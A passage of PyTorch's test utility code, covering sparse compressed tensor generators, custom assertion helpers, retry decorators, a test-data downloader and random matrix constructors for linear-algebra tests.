self._run_with_retry(result=result, num_runs_left=num_runs, report_only=not OVERRIDE_FLAKY_SIGNAL)
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
while counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
elements. To achieve this, the sampling method is built-up on
using a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
        filled with counts to meet the nnz constraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
                # that appears to give the exact result for all x values
                # less than 2**35; the exact upper limit of x is
                # TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
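    # A small worked example of the cumsum relationship described in the
    # docstring above (illustrative only): for a 3 x 4 CSR tensor with per-row
    # counts [2, 0, 3] (nnz == 5), the counts sequence with its leading zero is
    # [0, 2, 0, 3], and its cumulative sum gives crow_indices == [0, 2, 2, 5].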
def genSparseCompressedTensor(self, size, nnz, *, layout, device, dtype, index_dtype, block_size=()):
from operator import mul
from functools import reduce
sparse_dim = 2
assert all(size[d] > 0 for d in range(len(size))) or nnz == 0, 'invalid arguments'
assert len(size) >= sparse_dim
if block_size:
assert len(block_size) == 2
def random_sparse_compressed(n_compressed_dims, n_plain_dims, nnz):
compressed_indices = self._make_crow_indices(n_compressed_dims, n_plain_dims, nnz, device=device, dtype=index_dtype)
plain_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_compressed_dims):
count = compressed_indices[i + 1] - compressed_indices[i]
plain_indices[compressed_indices[i]:compressed_indices[i + 1]], _ = torch.sort(
torch.randperm(n_plain_dims, dtype=index_dtype, device=device)[:count])
low = -1 if dtype != torch.uint8 else 0
high = 1 if dtype != torch.uint8 else 2
values = make_tensor((nnz,) + block_size, device=device, dtype=dtype, low=low, high=high)
return values, compressed_indices, plain_indices
batch_shape = size[:-2]
n_batch = reduce(mul, batch_shape, 1)
if layout in {torch.sparse_csr, torch.sparse_bsr}:
n_compressed_dims, n_plain_dims = size[-2], size[-1]
else:
n_compressed_dims, n_plain_dims = size[-1], size[-2]
sparse_tensors = [random_sparse_compressed(n_compressed_dims, n_plain_dims, nnz) for _ in range(n_batch)]
sparse_tensors_it = map(list, zip(*sparse_tensors))
values = torch.stack(next(sparse_tensors_it)).reshape(*batch_shape, -1)
compressed_indices = torch.stack(next(sparse_tensors_it)).reshape(*batch_shape, -1)
plain_indices = torch.stack(next(sparse_tensors_it)).reshape(*batch_shape, -1)
return torch.sparse_compressed_tensor(compressed_indices, plain_indices,
values, size=size, dtype=dtype, layout=layout, device=device)
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
return self.genSparseCompressedTensor(size, nnz, layout=torch.sparse_csr, device=device,
dtype=dtype, index_dtype=index_dtype, block_size=())
def genSparseCSCTensor(self, size, nnz, *, device, dtype, index_dtype):
return self.genSparseCompressedTensor(size, nnz, layout=torch.sparse_csc, device=device,
dtype=dtype, index_dtype=index_dtype, block_size=())
def genSparseBSRTensor(self, size, block_size, nnz, *, device, dtype, index_dtype):
assert len(block_size) == 2
return self.genSparseCompressedTensor(size, nnz, layout=torch.sparse_bsr, device=device,
dtype=dtype, index_dtype=index_dtype, block_size=block_size)
def genSparseBSCTensor(self, size, block_size, nnz, *, device, dtype, index_dtype):
assert len(block_size) == 2
return self.genSparseCompressedTensor(size, nnz, layout=torch.sparse_bsc, device=device,
dtype=dtype, index_dtype=index_dtype, block_size=block_size)
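# Hedged usage sketch: the (compressed_indices, plain_indices, values)
# triple produced above matches what torch.sparse_csr_tensor accepts
# directly; e.g. for a 2x3 CSR tensor (illustrative values):
#
#   crow = torch.tensor([0, 2, 3])
#   col = torch.tensor([0, 2, 1])
#   val = torch.tensor([1., 2., 3.])
#   t = torch.sparse_csr_tensor(crow, col, val, size=(2, 3))
#   assert t.to_dense().tolist() == [[1., 0., 2.], [0., 3., 0.]]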
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert we are not given an impossible combination, where the sparse dims
# have empty numel but nnz > 0 would make the indices contain values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
# coalesce is only implemented for COO
if t.layout == torch.sparse_coo:
t = t.coalesce()
return t.to_dense()
# Compares a torch function with a reference function for a given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
numpy_sample = sample_input.numpy()
n_inp, n_args, n_kwargs = numpy_sample.input, numpy_sample.args, numpy_sample.kwargs
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False, **kwargs)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
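# Hedged usage sketch: inside a test, compare_with_numpy checks a torch
# op against its NumPy counterpart on a tensor-like input, e.g.
#
#   self.compare_with_numpy(torch.sin, np.sin, [0.0, 0.5, 1.0],
#                           device='cpu', dtype=torch.float64)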
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, it means the test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def assertEqual(
self,
x,
y,
msg: Optional[str] = None,
*,
atol: Optional[float] = None,
rtol: Optional[float] = None,
equal_nan=True,
exact_dtype=True,
# TODO: default this to True
exact_device=False,
exact_layout=False,
exact_stride=False,
exact_is_coalesced=False
):
# Hide this function from `pytest`'s traceback
__tracebackhide__ = True
# numpy's dtypes are a superset of what PyTorch supports. In case we encounter an unsupported dtype, we fall
# back to an elementwise comparison. Note that this has to happen here and not for example in
# `TensorOrArrayPair`, since at that stage we can no longer split the array into its elements and perform
# multiple comparisons.
if any(
isinstance(input, np.ndarray) and not has_corresponding_torch_dtype(input.dtype) for input in (x, y)
):
def to_list(input):
return input.tolist() if isinstance(input, (torch.Tensor, np.ndarray)) else list(input)
x = to_list(x)
y = to_list(y)
# When comparing a sequence of numbers to a tensor, we need to convert the sequence to a tensor here.
# Otherwise, the pair origination of `assert_equal` will fail, because the sequence is recognized as container
# that should be checked elementwise while the tensor is not.
elif isinstance(x, torch.Tensor) and isinstance(y, Sequence):
y = torch.as_tensor(y, dtype=x.dtype, device=x.device)
elif isinstance(x, Sequence) and isinstance(y, torch.Tensor):
x = torch.as_tensor(x, dtype=y.dtype, device=y.device)
assert_equal(
x,
y,
pair_types=(
NonePair,
RelaxedBooleanPair,
RelaxedNumberPair,
TensorOrArrayPair,
StringPair,
SetPair,
TypePair,
ObjectPair,
),
sequence_types=(
Sequence,
torch.storage._TypedStorage,
Sequential,
ModuleList,
ParameterList,
ScriptList,
torch.utils.data.dataset.Subset,
),
mapping_types=(Mapping, ModuleDict, ParameterDict, ScriptDict),
rtol=rtol,
rtol_override=self.rel_tol,
atol=atol,
atol_override=self.precision,
equal_nan=equal_nan,
check_device=exact_device,
check_dtype=exact_dtype,
check_layout=exact_layout,
check_stride=exact_stride,
check_is_coalesced=exact_is_coalesced,
msg=msg,
)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
# This API is used to simulate the deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
# Verifies that an exception with the type expected_exception and message
# matching the regular expression defined by expected_regex is thrown.
# If the test is instantiated for a non-native device type (like XLA)
# then the message is not validated.
# Checks whether the test is instantiated for a device type by testing
# if the test class has defined the device_type attribute and,
# if so, tests whether the instantiated device type is native or not
if hasattr(self, 'device_type') and self.device_type not in NATIVE_DEVICES: # type: ignore[attr-defined]
# empty string matches any string
expected_regex = ''
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
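# Hedged worked examples (default is 7 places):
#
#   self.assertGreaterAlmostEqual(1.0, 1.0 + 1e-8)      # passes: diff rounds to 0
#   self.assertGreaterAlmostEqual(1.0, 2.0, delta=0.5)  # raises: diff 1.0 > delta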
def assertAtenOp(self, onnx_model, operator, overload_name=""):
all_aten_nodes = [p for p in onnx_model.graph.node
if p.op_type == "ATen" and p.domain == "org.pytorch.aten"]
self.assertTrue(all_aten_nodes)
for op in all_aten_nodes:
attrs = {attr.name: attr.s.decode() for attr in op.attribute}
if attrs.get("operator") == operator:
break
self.assertEqual(attrs["operator"], operator)
self.assertEqual(attrs.get("overload_name", ""), overload_name)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
"""
Finds an available port and returns that port number.
NOTE: If this function is being used to allocate a port to Store (or
indirectly via init_process_group or init_rpc), it should be used
in conjunction with the `retry_on_connect_failures` decorator, as there is a potential
race condition where the allocated port may become unavailable before it can be used.
"""
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE,)):
"""Reruns a test if the test returns a RuntimeError and the exception
contains one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
n_retries = 10
tries_remaining = n_retries
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if any(connect_error in str(error) for connect_error in connect_errors):
tries_remaining -= 1
if tries_remaining == 0:
raise RuntimeError(f"Failing after {n_retries} retries with error: {str(error)}")
time.sleep(random.random())
continue
raise
return wrapper
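# Hedged usage sketch (hypothetical test): retry a c10d test whose
# RuntimeError message can contain "Address already in use".
#
#   @retry_on_connect_failures
#   def test_store_init(self):
#       port = find_free_port()
#       ...  # binding the port may race; rerun up to 10 times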
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
# FIXME: modernize these to be consistent with make_tensor
# and review including them in torch.testing
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
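# Hedged usage sketch: the requested rank can be verified numerically
# (illustrative, not part of the original suite):
#
#   A = random_square_matrix_of_rank(5, 3)
#   assert torch.linalg.matrix_rank(A).item() == 3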
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
# Returns a noncontiguous tensor with the same shape and values as t.
# The noncontiguous tensor is constructed such that elements in the innermost
# dimension are separated by zeros or (whenever possible) nans
# TODO: consider more complicated noncontiguity schemes
def noncontiguous_like(t):
# Short-circuits if t is already noncontiguous
if not t.is_contiguous():
return t
# Special-cases 0-dim tensors
zero_dim = t.ndim == 0
if zero_dim:
t = t.unsqueeze(0)
result = torch.repeat_interleave(t.detach(), 2, dim=-1)
# Choose a "weird" value that won't be accessed
if t.dtype.is_floating_point or t.dtype.is_complex:
value = math.nan
elif t.dtype == torch.bool:
value = True
else:
value = 12
if zero_dim:
result[0] = value
result.set_(result.storage(), 1, (), ())
else:
result[..., 1::2] = value
strides = list(result.stride())
strides[-1] *= 2
result.set_(result.storage(), result.storage_offset(), t.size(), stride=tuple(strides))
result.requires_grad_(t.requires_grad)
return result
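# Hedged usage sketch: the result compares equal to its input while
# being noncontiguous:
#
#   t = torch.arange(6.).reshape(2, 3)
#   nc = noncontiguous_like(t)
#   assert not nc.is_contiguous() and torch.equal(nc, t)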
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mT).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = (t + t.mT).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.mH).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
"""
Returns a batch of random symmetric positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_symmetric_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return A @ A.mT
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
Returns a batch of random Hermitian positive-semi-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return A @ A.mH
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.mT) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t @ t.mT + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return A @ A.mH + torch.eye(matrix_size, dtype=dtype, device=device)
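# Hedged usage sketch: positive-definiteness can be spot-checked with a
# Cholesky factorization, which only succeeds for PD matrices:
#
#   A = random_hermitian_pd_matrix(4, dtype=torch.cdouble, device='cpu')
#   torch.linalg.cholesky(A)  # would raise if A were not PD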
# Creates a full rank matrix with distinct singular values or
# a batch of such matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype, requires_grad=False):
with torch.no_grad():
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
k = min(shape[-1], shape[-2])
# We choose the singular values to be "around one"
# This is to make the matrix well conditioned
# s = [2, 3, ..., k+1]
s = torch.arange(2, k + 2, dtype=real_dtype, device=device)
# s = [2, -3, 4, ..., (-1)^k k+1]
s[1::2] *= -1.
# 1 + 1/s so that the singular values are in the range [2/3, 3/2]
# This gives a condition number of 9/4, which should be good enough
s.reciprocal_().add_(1.)
# Note that the singular values need not be ordered in an SVD so
# we don't need to sort s
x = (u * s.to(u.dtype)) @ vh
x.requires_grad_(requires_grad)
return x
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
if A.numel() == 0:
return A
u, _, vh = torch.linalg.svd(A, full_matrices=False)
